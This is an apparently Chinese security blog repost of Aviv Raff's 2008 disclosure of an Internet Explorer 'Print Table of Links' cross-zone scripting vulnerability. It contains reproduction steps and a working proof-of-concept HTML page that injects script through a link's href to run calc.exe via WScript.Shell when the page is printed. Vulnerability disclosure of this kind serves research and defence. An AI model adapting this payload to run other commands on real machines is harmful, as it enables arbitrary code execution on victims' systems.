Aviv Raff的IE0day,公布了 's

  • A+
所属分类:鬼仔Blog
摘要

来源:Sowhat的blog前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

来源:Sowhat的blog

前两天提到Aviv搞得这个“找”0day活动(http://hi.baidu.com/secway/blog/item/f21ad28b6bd86c7a9e2fb454.html),今天他公布细节了。

MS Internet Explorer “Print Table of Links” Cross-Zone Scripting Vulnerability
具体细节:http://aviv.raffon.net/2008/05/14/InternetExplorerQuotPrintTableOfLinksquotCrossZoneScriptingVulnerability.aspx

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码,当然VISTA上UAC可以拦截它 :)

重现:
1.下面这个地方打上勾
Aviv Raff的IE0day,公布了  's

2.把下面代码保存成HTML,用IE打开,打印之,calc.exe会弹出。 (也可以直接访问http://raffon.net/research/ms/ie/print/linksrce.html
<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(‘WScript.Shell’);x.Run(‘calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>

这个漏洞大牛蛙他们据说当时很快就找出来了,应该也有很多别的同学找到了吧。

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: